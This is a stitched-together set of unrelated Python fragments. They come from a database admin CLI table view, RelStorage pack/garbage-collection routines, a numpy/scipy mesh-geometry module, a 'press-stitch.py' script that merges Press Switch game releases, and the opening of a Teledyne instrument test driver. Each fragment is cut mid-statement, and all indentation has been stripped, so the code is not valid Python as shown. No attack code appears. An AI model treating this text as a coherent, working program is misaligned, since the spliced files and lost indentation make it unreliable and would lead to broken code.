('_disk', 'Disk (Total,Used%,Avail%)'), ('repl_factor', 'Replication Factor'), ('cache_read_pct','Post-Write-Queue Hit-Rate'),
'rack-aware', ('master_objects', 'Master Objects'),
('license_data_in_memory', 'Usage (Unique-Data) In-Memory'), ('license_data_on_disk', 'Usage (Unique-Data) On-Disk')
)
t = Table(title, column_names, sort_by=0)
t.add_cell_alert(
'namespace',
lambda data: data['migrations_in_progress'],
color=terminal.fg_red
)
t.add_data_source_tuple(
'_devices',
lambda data:str(data['devices_total']),
lambda data:str(data['devices_per_node']))
t.add_data_source_tuple(
'_memory',
Extractors.byte_extractor('memory_total'),
lambda data:"%.2f"%data["memory_used_pct"],
lambda data:"%.2f"%data["memory_available_pct"])
t.add_data_source_tuple(
'_disk',
Extractors.byte_extractor('disk_total'),
lambda data:"%.2f"%data["disk_used_pct"],
lambda data:"%.2f"%data["disk_available_pct"])
t.add_data_source(
'repl_factor',
lambda data:",".join([str(rf) for rf in data["repl_factor"]])
)
t.add_data_source(
'master_objects',
Extractors.sif_extractor('master_objects')
)
t.add_data_source(
'license_data_in_memory',
Extractors.byte_extractor('license_data_in_memory')
)
t.add_data_source(
'license_data_on_disk',
Extractors.byte_extractor('license_data_on_disk')
)
for ns, ns_stats in stats.iteritems():
if isinstance(ns_stats, Exception):
row = {}
else:
row = ns_stats
row['namespace'] = ns
row['memory_used_pct'] = 100.00 - row['memory_available_pct']
t.insert_row(row)
CliView.print_result(t)
@staticmethod
def _summary_namespace_list_view(stats, **ignore):
print "Namespaces"
print | |
objects per minute, but 99% time
# spent in memmove().
#
# Using manual indexing of arrays, CPU usage of less than
# 35%; for the first time, 35% of profile time is spent in
# talking to MySQL (over gigabit switch); clearly parallel
# pre-fetching would be useful.
batch = oids[oids_done:oids_done + self.fill_object_refs_batch_size]
oids_done += len(batch)
refs_found = self._add_refs_for_oids(load_batcher, store_batcher,
batch, get_references)
num_refs_found += refs_found
self.on_fill_object_ref_batch(oid_batch=batch, num_refs_found=refs_found)
now = perf_counter()
if now >= log_at:
# Save the work done so far.
store_batcher.flush()
store_connection.commit()
log_at = now + self.fill_object_refs_commit_frequency
logger.info(
"pre_pack: objects analyzed: %d/%d (%d total references)",
oids_done, oid_count, num_refs_found)
# Those 30MM objects wound up with about 48,976,835 references.
store_batcher.flush()
store_connection.commit()
logger.info(
"pre_pack: objects analyzed: %d/%d", oids_done, oid_count)
def _add_refs_for_oids(self, load_batcher, store_batcher,
oids, get_references):
"""
Fill object_refs with the states for some objects.
Returns the number of references added.
"""
# oids should be a slice of an ``OidList``, which may be an
# ``array.array``; those are relatively slow to iterate.
# The batcher always does deletes before inserts, which is
# exactly what we want.
# In the past, we performed all deletes and then all inserts;
# now, things to batching, they could be interleaved, but
# because we process OID-by-OID, that should be fine.
# In the past, we also DELETED from object_refs_added and object_ref
# everything found in the ``oids`` parameter; now we only do a delete if
# we get back a row from object_state; again, that shouldn't matter, rows
# should be found in object_state.
object_ref_schema = store_batcher.row_schema_of_length(3)
object_refs_added_schema = store_batcher.row_schema_of_length(2)
# Use the batcher to get efficient ``= ANY()``
# queries, but go ahead and collect into a list at once
rows = list(load_batcher.select_from(
('zoid', 'tid', 'state'),
'object_state',
suffix=' ORDER BY zoid ',
zoid=oids
))
num_refs_found = 0
for from_oid, tid, state in rows:
state = self.driver.binary_column_as_state_type(state)
row = (from_oid, tid)
store_batcher.insert_into(
'object_refs_added (zoid, tid)',
object_refs_added_schema,
row,
row,
size=2
)
store_batcher.delete_from(
'object_refs_added',
zoid=from_oid
)
store_batcher.delete_from(
'object_ref',
zoid=from_oid
)
if state:
try:
to_oids = get_references(state)
except:
logger.exception(
"pre_pack: can't unpickle "
"object %d in transaction %d; state length = %d",
from_oid, tid, len(state)
)
raise
for to_oid in to_oids:
row = (from_oid, tid, to_oid)
num_refs_found += 1
store_batcher.insert_into(
'object_ref (zoid, tid, to_zoid)',
object_ref_schema,
row,
row,
size=3
)
return num_refs_found
@metricmethod
def pre_pack(self, pack_tid, get_references):
"""
Decide what the garbage collector should delete.
Objects created or modified after pack_tid will not be garbage
collected.
get_references is a function that accepts a pickled state and
returns a set of OIDs that state refers to.
The self.options.pack_gc flag indicates whether to run garbage
collection. If pack_gc is false, this method does nothing.
"""
if not self.options.pack_gc:
logger.warning("pre_pack: garbage collection is disabled on a "
"history-free storage, so doing nothing")
return
load_connection = LoadConnection(self.connmanager)
store_connection = PrePackConnection(self.connmanager)
try:
try:
self._pre_pack_main(load_connection, store_connection,
pack_tid, get_references)
except:
logger.exception("pre_pack: failed")
store_connection.rollback_quietly()
raise
else:
store_connection.commit()
logger.info("pre_pack: finished successfully")
finally:
load_connection.drop()
store_connection.drop()
def _pre_pack_main(self, load_connection, store_connection,
pack_tid, get_references):
"""
Determine what to garbage collect.
*load_connection* is a
:class:`relstorage.adapters.connections.LoadConnection`; this
connection is in "snapshot" mode and is used to read a
consistent view of the database. Although this connection is
never committed or rolled back while this method is running
(which may take a long time), because load connections are
declared to be read-only the database engines can make certain
optimizations that reduce the overhead of them (e.g.,
https://dev.mysql.com/doc/refman/5.7/en/innodb-performance-ro-txn.html),
making long-running transactions less problematic. For
example, while packing a 60 million row single MySQL storage
with ``zc.zodbdgc``, a load transaction was open and actively
reading for over 8 hours while the database continued to be
heavily written to without causing any problems.
*store_connection* is a standard read-committed store connection;
it will be periodically committed.
"""
# First, fill the ``pack_object`` table with all known OIDs
# as they currently exist in the database, regardless of
# what the load_connection snapshot can see (which is no later
# and possibly earlier, than what the store connection can see).
#
# Mark things that need to be kept:
# - the root object;
# - anything that has changed since ``pack_tid``;
# Note that we do NOT add items that have been newly added since
# ``pack_tid``; no need to traverse into them, they couldn't possibly
# have a reference to an older object that's not also referenced
# by an object in the snapshot (without the app doing something seriously
# wrong): plus, we didn't find references from that item anyway.
#
# TODO: Copying 30MM objects takes almost 10 minutes (600s)
# against mysql 8 running on an SSD, and heaven forgive you if
# you kill the transaction and roll back --- the undo info is
# insane. What if we CREATE AS SELECT a table? Doing 'CREATE
# TEMPORARY TABLE AS' takes 173s; doing 'CREATE TABLE AS'
# takes 277s.
#
# On PostgreSQL we could use unlogged tables; this is somewhat faster
# in some tests (15 minutes vs 12?)
logger.info("pre_pack: filling the pack_object table")
stmt = """
%(TRUNCATE)s pack_object;
INSERT INTO pack_object (zoid, keep, keep_tid)
SELECT zoid, CASE WHEN tid > %(pack_tid)s THEN %(TRUE)s ELSE %(FALSE)s END, tid
FROM object_state;
-- Also keep the root
UPDATE pack_object
SET keep = %(TRUE)s
WHERE zoid = 0;
"""
self.runner.run_script(store_connection.cursor, stmt, {'pack_tid': pack_tid})
store_connection.commit()
logger.info("pre_pack: Filled the pack_object table")
# Chase down all the references using a consistent snapshot, including
# only the objects that were visible in ``pack_object``.
self.fill_object_refs(load_connection, store_connection, get_references)
# Traverse the graph, setting the 'keep' flags in ``pack_object``
self._traverse_graph(load_connection, store_connection)
def _find_pack_tid(self):
"""If pack was not completed, find our pack tid again"""
# pack (below) ignores its pack_tid argument, so we can safely
# return None here
return None
__find_zoid_to_delete_query = Schema.pack_object.select(
it.c.zoid
).where(
it.c.keep == False # pylint:disable=singleton-comparison
).order_by(
it.c.zoid
)
# This query is used to feed ``packed_func``, which is used
# to normalize the local cache.
__find_zoid_tid_to_delete_query = Schema.pack_object.select(
it.c.zoid, it.c.keep_tid
).where(
it.c.keep == False # pylint:disable=singleton-comparison
).order_by(
it.c.zoid
)
@metricmethod
def pack(self, pack_tid, packed_func=None):
"""Run garbage collection.
Requires the information provided by pre_pack.
"""
# pylint:disable=too-many-locals
# Read committed mode is sufficient.
store_connection = StoreConnection(self.connmanager)
try: # pylint:disable=too-many-nested-blocks
try:
# On PostgreSQL, this uses the index
# ``pack_object_keep_false`` So if there's lots of
# garbage, this only touches a small part of the table
# and is surprisingly fast (it doesn't even need to
# sort); between 40s (cached) and 2 minutes (uncached)
# on a pack_object containing 60MM rows.
#
# Attempting to join these results against the
# object_state table and do the delete in one shot
# (60MM rows, half garbage) took more than 24 hours
# against a remote PostgreSQL database (before I killed it), the
# same one that ran the above query in 40s. It appears
# to spend a lot of time checkpointing (each
# checkpoint takes an hour!) Even on a faster
# database, that's unlikely to be suitable for production.
#
# Breaking it into chunks, as below, took about an hour.
logger.debug("pack: Fetching objects to remove.")
with self._make_ss_load_cursor(store_connection) as cursor:
with _Progress('execute') as progress:
self.__find_zoid_to_delete_query.execute(cursor)
progress.mark('download')
to_remove = OidList(row[0] for row in cursor)
# On postgres, with a regular cursor, fetching 32,502,545 objects to remove
# took 56.7s (execute: 50.8s; download 5.8s; memory delta 1474.82 MB);
# The second time took half of that.
# Switching to a server side cursor brought that to
# fetched 32,502,545 objects to remove in
# 41.74s (execute: 0.00s; download 41.74s; memory delta 257.21 MB)
total = len(to_remove)
logger.debug(
"pack: fetched %d objects to remove in %.2fs "
"(execute: %.2fs; download %.2fs; memory delta %s)",
total,
progress.duration,
progress.phase_duration('execute'),
progress.phase_duration('download'),
progress.total_memory_delta_display,
)
logger.info("pack: will remove %d object(s)", total)
# We used to hold the commit lock and do this in | |
"""Defines N-1 dimensional surfaces in N-dimensional space.
All surfaces are represented by a Mesh with points and connections (i.e. line segments or triangles) between those points.
"""
import numpy as np
from scipy import sparse, linalg
from nibabel import freesurfer, spatialimages, gifti
import nibabel as nib
from operator import xor
import datetime
import tempfile
import numba
from scipy import spatial, optimize
from six import string_types
from pathlib import Path
from .utils import signed_tetrahedral_volume
from copy import deepcopy
from loguru import logger
class Mesh(object):
"""General mesh object.
Defines methods that are independent of the number of dimensions.
"""
vertices = None
faces = None
_graph = None
_normal = None
_tree = None
@property
def nvertices(self, ):
"""
Number of vertices on the mesh
"""
return self.vertices.shape[1]
@property
def ndim(self, ):
"""
Dimensionality of the embedding space
"""
return self.vertices.shape[0]
@property
def nfaces(self, ):
"""
Number of surface elements connecting the vertices.
"""
return self.faces.shape[1]
def graph_connection_point(self, dtype='bool'):
"""
Returns the interactions between vertices and faces as a sparse matrix.
The resulting matrix can be used to multiply a vector of size M faces to get a vector of size N vertices.
The result of this method is cached in _graph (set _graph to None to re-compute the graph).
:param dtype: data type of the resulting sparse matrix
:return: (N, M) sparse matrix for N vertices and M faces, which is one if connection M interacts with N.
"""
if self._graph is not None:
return self._graph.astype(dtype)
rows = self.faces.flatten()
cols = (np.ones(self.faces.shape[0])[:, None] * np.arange(self.nfaces)[None, :]).flatten().astype('i4')
data = np.ones(rows.size, dtype='bool')
res = sparse.coo_matrix((data, (rows, cols)),
shape=(self.nvertices, self.nfaces)).tocsr()
self._graph = res
return res.astype(dtype)
def graph_point_point(self, weight=None, dtype='bool', include_diagonal=True):
"""
Converts the mesh into a graph describing the edges between the individual vertices (nodes).
:param weight: Weights the boundaries by the distance between the vertices if set to "distance"
:param dtype: datatype of the resulting sparse matrix (only used if `weight` is None)
:param include_diagonal: if set to False exclude the diagonal from the sparse matrix
:return: (N, N) sparse matrix for N vertices, which is one (or the value set by `weight`) if the vertices are connected.
"""
pc_graph = self.graph_connection_point(dtype=dtype)
pp_graph = pc_graph * pc_graph.T
if not include_diagonal:
pp_graph.setdiag(False)
pp_graph.eliminate_zeros()
if weight is not None:
graph_as_coo = pp_graph.tocoo()
if weight == 'distance':
weight = np.sqrt(np.sum((self.vertices[:, graph_as_coo.row] - self.vertices[:, graph_as_coo.col]) ** 2, 0))
graph_as_coo.data = weight * np.ones_like(graph_as_coo.data)
pp_graph = graph_as_coo.tocsr()
return pp_graph
def graph_connection_connection(self, weight=None, dtype='bool'):
"""
Converts the mesh into a graph, where the nodes are the faces and the edges are between those faces sharing vertices.
:param weight: Weights the boundaries by the distance between the connection centers if set to "distance"
:param dtype: datatype of the resulting sparse matrix (only used if `weight` is None)
:return: (N, N) sparse matrix for N faces, which is one (or the value set by `weight`) if the faces share a vertex.
"""
pc_graph = self.graph_connection_point(dtype=dtype)
cc_graph = pc_graph.T * pc_graph
if weight is not None:
graph_as_coo = cc_graph.tocoo()
if weight == 'distance':
positions = np.mean(self.vertices[:, self.faces], 1)
weight = np.sqrt(np.sum((positions[:, graph_as_coo.row] - positions[:, graph_as_coo.col]) ** 2, 0))
graph_as_coo.data = weight * np.ones_like(graph_as_coo.data)
cc_graph = graph_as_coo.tocsr()
return cc_graph
def surface_edge_distance(self, use=None, method='auto', return_predecessors=False, use_connections=False):
"""
Returns a matrix of the shortest distances across the edges connecting the vertices.
This is an upper limit to the true distance across the surface,
because the path is limited to following the edges of the triangular mesh.
This is a wrapper around `scipy.sparse.csgraph.shortest_path`.
:param use: boolean array indicating which vertices or faces to use (default: use all)
:param method: method used by `scipy.sparse.csgraph.shortest_path`.
:param return_predecessors: whether to return the (N, N) predecessor matrix
:param use_connections: compute the shortest distance between the faces rather than the vertices.
:return: (N, N) matrix of shortest distances across the graph
"""
if use_connections:
graph = self.graph_connection_connection(weight="distance")
else:
graph = self.graph_point_point(weight="distance")
if use is not None:
graph = graph[use, :][:, use]
nclusters, labels = sparse.csgraph.connected_components(graph, directed=False)
distance = []
for ixcluster in range(np.amax(labels) + 1):
use = labels == ixcluster
distance.append(sparse.csgraph.shortest_path(graph[use, :][:, use], method=method,
return_predecessors=return_predecessors))
return labels, distance
return sparse.csgraph.shortest_path(graph, method=method, return_predecessors=return_predecessors)
def size_vertices(self, ):
"""
Attributes the size of the faces to the vertices they connect.
"""
return self.graph_connection_point() * self.size_faces() / self.faces.shape[0]
def connected_components(self, ):
"""
Returns a tuple with (number of connected components, labeling of connected components).
"""
return sparse.csgraph.connected_components(self.graph_point_point())
def closed(self, ):
"""
Checks if the mesh is closed.
"""
raise NotImplementedError("No generic implementation for N-dimensional mesh")
@property
def tree(self, ):
"""
A KD tree used to compute the distance between the vertices defining the surface and any other vertices
:rtype: scipy.spatial.cKDTree
"""
if self._tree is None:
self._tree = spatial.cKDTree(self.vertices.T)
return self._tree
def closest_vertex(self, points):
"""
Finds the closest vertices on the surface for a bunch of vertices
:param points: (ndim, nvertices) array with the reference vertices
:return: tuple with
- (nvertices, ) distance array
- (nvertices, ) index array
"""
return self.tree.query(points.T)
class Mesh1D(Mesh):
"""
1-dimensional mesh object consisting of vertices and lines connecting these vertices
Attributes:
`vertices`: (M, N) array with the vertices of the curve in M-dimensional space.
`faces`: (2, K) index array with all the line segments.
"""
def __init__(self, vertices, faces='open'):
"""
Creates a new curve
:param vertices: (M, N) array with N vertices on a one-dimensional curve in M-dimensional space
:param faces: (2, K) array with integers of which lines are connected
If faces is:
- 'open': defaults to connecting all vertices in order
- 'closed': defaults to connecting all vertices in order and connect the last point to the first
"""
self.vertices = np.asarray(vertices)
if faces == 'open':
faces = np.array([np.arange(self.vertices.shape[1] - 1), np.arange(1, self.vertices.shape[1])])
elif faces == 'closed':
faces = np.array([np.arange(self.vertices.shape[1]), np.roll(np.arange(self.vertices.shape[1]), -1)])
self.faces = faces
if self.ndim > self.nvertices + 3:
raise ValueError('N(dimensions) >> N(vertices), you should probably transpose the vertices array')
if self.faces.shape[0] != 2:
raise ValueError('1D-mesh faces should have shape (2, K), not %s' % self.faces.shape)
if self.vertices.ndim != 2 or self.faces.ndim != 2:
raise ValueError('vertices and faces should be 2-dimensional')
def size_faces(self, ):
"""
Computes the length of the line segments connecting the vertices.
"""
return np.sum((self.vertices[:, self.faces[0, :]] - self.vertices[:, self.faces[1, :]]) ** 2, 0)
def as_lines(self, as_indices=False):
"""
Return the connected vertices as a list of curves.
:param as_indices: Returns the indices of the vertices rather than the vertices themselves
:return: List[Array], where the array is a (L, ) array of indices if as_indices is True or (L, 2) array of vertices otherwise
"""
lines = [[ixpoint] for ixpoint in np.arange(self.nvertices)]
for connection in self.faces.T:
start = None
end = None
for ixline, line in enumerate(lines):
if connection[1] == line[0]:
end = ixline
if connection[0] == line[-1]:
start = ixline
if start != end:
lines[start].extend(lines[end])
lines.pop(end)
if as_indices:
return [np.array(line) for line in lines]
return [self.vertices[:, np.array(line)] for line in lines]
def closed(self, ):
"""
Check if the mesh is closed (i.e. every vertex has zero or at least two faces).
"""
nconn = np.sum(self.graph_connection_point(), -1)
return (nconn != 1).all()
def find_intersections(self, position, orientation, return_position=False):
"""
Finds out which faces intersection with position + a * hemisphere.
:param position: origin of the ray
:param orientation: propagation direction of the ray
:param return_position: if True also return the coordinates of the intersection
:return: (K, ) boolean array with the intercepted faces
"""
offset = self.vertices - position[:, None]
outer_product = offset[0, ...] * orientation[1] - offset[1, ...] * orientation[0]
intercepts = np.prod(np.sign(outer_product[self.faces]), 0) < 0
if not return_position:
return intercepts
use_offsets = offset[:, self.faces][:, :, intercepts]
if orientation[0] == 0:
result = -use_offsets[0, 0, :] / (use_offsets[0, 1, :] - use_offsets[0, 0, :])
else:
nominator = use_offsets[1, 0, :] - use_offsets[0, 0, :] * orientation[1] / orientation[0]
denominator = -(use_offsets[1, 1, :] - use_offsets[1, 0, :]) + (use_offsets[0, 1, :] - use_offsets[0, 0, :]) * orientation[1] / orientation[0]
result = nominator / | |
#-----------------------------------------------------------------------------
# press-stitch.py
# Merges the three Press Switch games together
# pylint: disable=bad-indentation
#-----------------------------------------------------------------------------
import getopt
import hashlib
import os.path
import pathlib
import shutil
import sys
import csv
import copy
import zipfile
import press_stitch_archive
import rpp
import backgrounds_map
# Mappings for 0.3 -> 0.5
import character_map_35_chris
import character_map_35_ciel
import character_map_35_eliza
import character_map_35_karyn
import character_map_35_main
import character_map_35_martha
import character_map_35_michelle
import character_map_35_mother
import character_map_35_nick
import character_map_35_vanessa
# Mappings for 0.4 -> 0.5
import character_map_45_alma
import character_map_45_amber
import character_map_45_anna
import character_map_45_april
import character_map_45_candice
import character_map_45_chris
import character_map_45_ciel
import character_map_45_cindy
import character_map_45_donald
import character_map_45_eliza
import character_map_45_erin
import character_map_45_ermach
import character_map_45_hillary
import character_map_45_jenna
import character_map_45_jennifer
import character_map_45_jillian
import character_map_45_karyn
import character_map_45_kayla
import character_map_45_main
import character_map_45_martha
import character_map_45_melina
import character_map_45_michelle
import character_map_45_mika
import character_map_45_mother
import character_map_45_nelson
import character_map_45_nick
import character_map_45_nurse
import character_map_45_sean
import character_map_45_vanessa
import character_map_45_waitress
# Mappings for 0.5 -> 0.6
import character_map_56_eliza
import character_map_56_main
filename_03 = "Press-SwitchV0.3b-all";
filename_04 = "Press-SwitchV0.4a-pc";
filename_05 = "Press-SwitchV0.5c-pc";
filename_06 = "Press-SwitchV0.6";
# The key is the label used in an RPY "show" command to show a character.
# The value is the character directory used to find the images.
characterLabelMap = {
"alma": "alma",
"amber": "amber",
"amberd": "amber",
"anna": "anna",
"april": "april",
"candice": "candice",
"candiced": "candice",
"chris": "chris",
"chrisd": "chris",
"chrisghost": "chris",
"ciel": "ciel",
"cindy": "cindy",
"donald": "donald",
"donaldd": "donald",
"donaldflash": "donald",
"eliza": "eliza",
"elizad": "eliza",
"elizaflash": "eliza",
"elizaghost": "eliza",
"erin": "erin",
"erind": "erin",
"eringhost": "erin",
"hillary": "hillary",
"hillaryd": "hillary",
"jenna": "jenna",
"jennifer": "jennifer",
"jenniferd": "jennifer",
"jillian": "jillian",
"jilliand": "jillian",
"karyn": "karyn",
"karynd": "karyn",
"karynflash": "karyn",
"karynghost": "karyn",
"kayla": "kayla",
"kaylad": "kayla",
"main": "main",
"maind": "main",
"mainflash": "main",
"mainghost": "main",
"martha": "martha",
"marthad": "martha",
"marthaghost": "martha",
"melina": "melina",
"michelle": "michelle",
"michelled": "michelle",
"michelleghost": "michelle",
"mika": "mika",
"mikad": "mika",
"mother": "mother",
"nelson": "nelson",
"nick": "nick",
"nurse": "nurse",
"sean": "sean",
"vanessa": "vanessa",
"vanessad": "vanessa",
"waitress": "waitress"
};
# Map showing whether to remap the character based on RenPy variables
characterDoRemap = {
"alma": False,
"amber": False,
"amberd": True,
"anna": False,
"april": False,
"candice": False,
"candiced": True,
"chris": False,
"chrisd": True,
"chrisghost": False,
"ciel": False,
"cindy": False,
"donald": False,
"donaldd": True,
"donaldflash": False,
"eliza": False,
"elizad": True,
"elizaflash": False,
"elizaghost": False,
"erin": False,
"erind": True,
"eringhost": False,
"hillary": False,
"hillaryd": True,
"jenna": False,
"jennifer": False,
"jenniferd": True,
"jillian": False,
"jilliand": True,
"karyn": False,
"karynd": True,
"karynflash": False,
"karynghost": False,
"kayla": False,
"kaylad": True,
"main": False,
"maind": True,
"mainflash": False,
"mainghost": False,
"martha": False,
"marthad": True,
"marthaghost": False,
"melina": False,
"michelle": False,
"michelled": True,
"michelleghost": False,
"mika": False,
"mikad": True,
"mother": False,
"nelson": False,
"nick": False,
"nurse": False,
"sean": False,
"vanessa": False,
"vanessad": True,
"waitress": False,
};
characterImageMap35 = {
"chris": character_map_35_chris .characterMapChris,
"ciel": character_map_35_ciel .characterMapCiel,
"eliza": character_map_35_eliza .characterMapEliza,
"karyn": character_map_35_karyn .characterMapKaryn,
"main": character_map_35_main .characterMapMain,
"martha": character_map_35_martha .characterMapMartha,
"michelle": character_map_35_michelle.characterMapMichelle,
"mother": character_map_35_mother .characterMapMother,
"nick": character_map_35_nick .characterMapNick,
"vanessa": character_map_35_vanessa .characterMapVanessa,
};
characterImageMap45 = {
"alma": character_map_45_alma .characterMapAlma,
"amber": character_map_45_amber .characterMapAmber,
"anna": character_map_45_anna .characterMapAnna,
"april": character_map_45_april .characterMapApril,
"candice": character_map_45_candice .characterMapCandice,
"chris": character_map_45_chris .characterMapChris,
"ciel": character_map_45_ciel .characterMapCiel,
"cindy": character_map_45_cindy .characterMapCindy,
"donald": character_map_45_donald .characterMapDonald,
"eliza": character_map_45_eliza .characterMapEliza,
"erin": character_map_45_erin .characterMapErin,
"ermach": character_map_45_ermach .characterMapErmach,
"hillary": character_map_45_hillary .characterMapHillary,
"jenna": character_map_45_jenna .characterMapJenna,
"jennifer": character_map_45_jennifer.characterMapJennifer,
"jillian": character_map_45_jillian .characterMapJillian,
"karyn": character_map_45_karyn .characterMapKaryn,
"kayla": character_map_45_kayla .characterMapKayla,
"main": character_map_45_main .characterMapMain,
"martha": character_map_45_martha .characterMapMartha,
"melina": character_map_45_melina .characterMapMelina,
"michelle": character_map_45_michelle.characterMapMichelle,
"mika": character_map_45_mika .characterMapMika,
"mother": character_map_45_mother .characterMapMother,
"nelson": character_map_45_nelson .characterMapNelson,
"nick": character_map_45_nick .characterMapNick,
"nurse": character_map_45_nurse .characterMapNurse,
"sean": character_map_45_sean .characterMapSean,
"vanessa": character_map_45_vanessa .characterMapVanessa,
"waitress": character_map_45_waitress.characterMapWaitress
};
characterImageMap56 = {
"eliza": character_map_56_eliza .characterMapEliza,
"main": character_map_56_main .characterMapMain,
};
# Initial state of RenPy variables
pyVariables = {
"Al.display": "alma",
"Am.display": "amber",
"Can.display": "candice",
"ch.display": "chris",
"Do.display": "donald",
"e.display": "eliza",
"er.display": "erin",
"hi.display": "hillary",
"je.display": "jennifer",
"ji.display": "jillian",
"k.display": "karyn",
"ka.display": "kayla",
"ma.display": "martha",
"m.display": "mika",
"M.display": "main",
"mic.display": "michelle",
"Nel.display": "nelson",
"nur2.display": "nurse",
"Te.display": "teacher",
"v.display": "vanessa"
};
# Association of person name to RenPy display variable
personDispVars = {
"alma": "Al.display",
"amber": "Am.display",
"candice": "Can.display",
"chris": "ch.display",
"donald": "Do.display",
"eliza": "e.display",
"erin": "er.display",
"hillary": "hi.display",
"jennifer": "je.display",
"jillian": "ji.display",
"karyn": "k.display",
"kayla": "ka.display",
"martha": "ma.display",
"mika": "m.display",
"main": "M.display",
"michelle": "mic.display",
"nelson": "Nel.display",
"nurse": "nur2.display",
"teacher": "Te.display",
"vanessa": "v.display"
};
# List of active threads
threads = [];
# List of label call objects
labelCalls = [];
inlineErrors = False;
#-----------------------------------------------------------------------------
def printRed(s):
#type: (str) -> None
print("\033[1;31m" + s + "\033[0m");
#-----------------------------------------------------------------------------
def showError(txt):
#type: (str) -> None
printRed("Error: " + txt);
#-----------------------------------------------------------------------------
def flagError(rpFile, lineNum, txt):
#type: (rpp.RenPyFile, int, str) -> str
showError("Line " + str(lineNum) + ": " + txt);
if inlineErrors:
return rpFile.lines[lineNum].strip('\n') + " # ERROR: " + txt + "\n";
sys.exit(1);
#-----------------------------------------------------------------------------
def md5(fname):
#type: (str) -> str
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
#-----------------------------------------------------------------------------
def verifySingleFile(filename, desiredHash):
#type: (str, str) -> bool
print("Verifying " + filename + "...");
if (not(os.path.exists(filename))):
showError("File does not exist!");
return False;
actualHash = md5(filename);
if (actualHash != desiredHash):
showError("Checksum is not correct, please download the file again");
print("Desired MD5: " + desiredHash);
print("Actual MD5 : " + actualHash);
return False;
print("Succeeded");
return True;
#-----------------------------------------------------------------------------
def unzipFile(filename):
#type: (str) -> None
print("Unzipping file " + filename + "...");
with zipfile.ZipFile(filename, 'r') as zip_ref:
zip_ref.extractall(".")
#-----------------------------------------------------------------------------
def removeDir(filename):
#type: (str) -> None
if os.path.isdir(pathlib.Path(filename)):
print("Removing directory " + filename + "...");
shutil.rmtree(filename);
#-----------------------------------------------------------------------------
def checkFile(dirname, checksum):
#type: (str, str) -> bool
if os.path.isdir(pathlib.Path(dirname)):
print("Directory " + dirname + " exists, ZIP extract skipped");
return True;
filename = dirname + ".zip";
if not(verifySingleFile(filename, checksum)):
return False;
unzipFile(filename);
return True;
#-----------------------------------------------------------------------------
def doMakeDir(path):
#type: (str) -> None
if (os.path.isdir(pathlib.Path(path))):
print("Directory " + path + " already exists, skipping creation");
else:
print("Creating directory " + path);
os.mkdir(path);
#-----------------------------------------------------------------------------
def doCopyFile(srcPath, dstPath, filename):
#type: (str, str, str) -> None
srcFile = os.path.join(srcPath, filename);
print("Copying file " + srcFile + " into " + dstPath);
shutil.copy(srcFile, dstPath);
#-----------------------------------------------------------------------------
def isNumberField(s):
#type: (str) -> bool
for c in s:
if not(c in "0123456789"):
return False;
return True;
#-----------------------------------------------------------------------------
def expandNumberField(s):
#type: (str) -> str
if not(isNumberField(s)):
return s;
return s.zfill(3);
#-----------------------------------------------------------------------------
def getIndentOf(line):
#type: (str) -> int
indent = 0;
lineLen = len(line);
while((indent < lineLen) and (line[indent] == ' ')):
indent = indent + 1;
return indent;
#-----------------------------------------------------------------------------
def processCommand(rpFile, thread, lineNum, line):
#type: (rpp.RenPyFile, rpp.RenPyThread, int, str) -> None
fields = list(csv.reader([line], delimiter=' '))[0];
if (len(fields) < 2):
return;
# Try for a UI timer jump
if (fields[0].startswith("ui.timer(") and fields[1].startswith("ui.jumps(")):
jumpLabel = fields[1].split('"')[1];
addLabelCall(rpFile, jumpLabel, thread);
return;
# Try for a variable assignment
if (len(fields) < 3):
return;
pyVar = fields[0].strip();
pyVal = fields[2].strip().strip('"').strip('\'');
#print(str(lineNum) + ": Command " + str(fields));
if (fields[1] == "="):
thread.vars[pyVar] = pyVal;
#print("Variable '" + pyVar + "' becomes '" + pyVal + "'");
elif (fields[1] == "+="):
if not(pyVar in thread.vars):
flagError(rpFile, lineNum, "Variable '" + pyVar + "' not found in thread");
thread.vars[pyVar] = str(int(thread.vars[pyVar]) + int(pyVal));
elif (fields[1] == "-="):
if not(pyVar in thread.vars):
flagError(rpFile, lineNum, "Variable '" + pyVar + "' not found in thread");
thread.vars[pyVar] = str(int(thread.vars[pyVar]) - int(pyVal));
else:
flagError(rpFile, lineNum, "Unsupported operator '" + fields[1] + "', line is: " + line);
#-----------------------------------------------------------------------------
def calculateCondition(thread, lineNum, fields):
#type: (rpp.RenPyThread, int, list[str]) -> bool
offset = 1;
while(offset < len(fields)):
varname = fields[offset];
condition = fields[offset + 1];
value = fields[offset + 2];
if not(varname in thread.vars):
return False;
if (condition == "=="):
cont = False;
if (value[-1] == ","):
cont = True;
value = value.strip(',');
if (thread.vars[varname] == value.strip('"').strip('\'')):
return True;
if (cont):
offset = offset + 1;
value = fields[offset + 2];
if (thread.vars[varname] == value.strip('"').strip('\'')):
return True;
elif (condition == ">="):
if (int(thread.vars[varname]) >= int(value.strip('"').strip('\''))):
return True;
else:
showError("Condition " + condition + " not supported");
sys.exit(1);
offset = offset + 3;
if ((offset < len(fields) and not(fields[offset] == "or"))):
showError(str(lineNum) + ": Boolean operator " + fields[offset] + " not supported, fields are " + str(fields));
sys.exit(1);
offset = offset + 1;
return False;
#-----------------------------------------------------------------------------
def processIfStep(rpFile, thread):
#type: (rpp.RenPyFile, rpp.RenPyThread) -> None
obj = thread.stack[-1];
line = rpFile.lines[obj.lineNum].split(':')[0];
fields = line.split();
# Are we still in the block?
if (not(rpFile.indentIsGood(obj.lineNum, obj.indent))):
thread.stack.pop(); # Kill the IF
return;
# Call the "if" hook to see if the file has special processing
rpFile.hookIf(thread);
if((fields[0] == "if") or (fields[0] == "elif")):
condition = calculateCondition(thread, obj.lineNum, fields);
if (condition and not(obj.hasExecuted)):
obj.hasExecuted = True;
thread.stack.append(rpp.RenPyBlock(obj.lineNum + 1, obj.indent + 4));
obj.lineNum = rpFile.blockEndLine(obj.lineNum + 1, obj.indent + 4);
elif (fields[0] == "else"):
if not(obj.hasExecuted):
thread.stack.append(rpp.RenPyBlock(obj.lineNum + 1, obj.indent + 4));
obj.lineNum = rpFile.blockEndLine(obj.lineNum + 1, obj.indent + 4);
return;
thread.stack.pop();
else:
# Must have finished the block
thread.stack.pop();
#-----------------------------------------------------------------------------
def | |
<gh_stars>0
"""
@package mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_driver
@author <NAME>
"""
__author__ = '<NAME>'
__license__ = 'Apache 2.0'
import socket
import unittest
import time as time
import datetime as dt
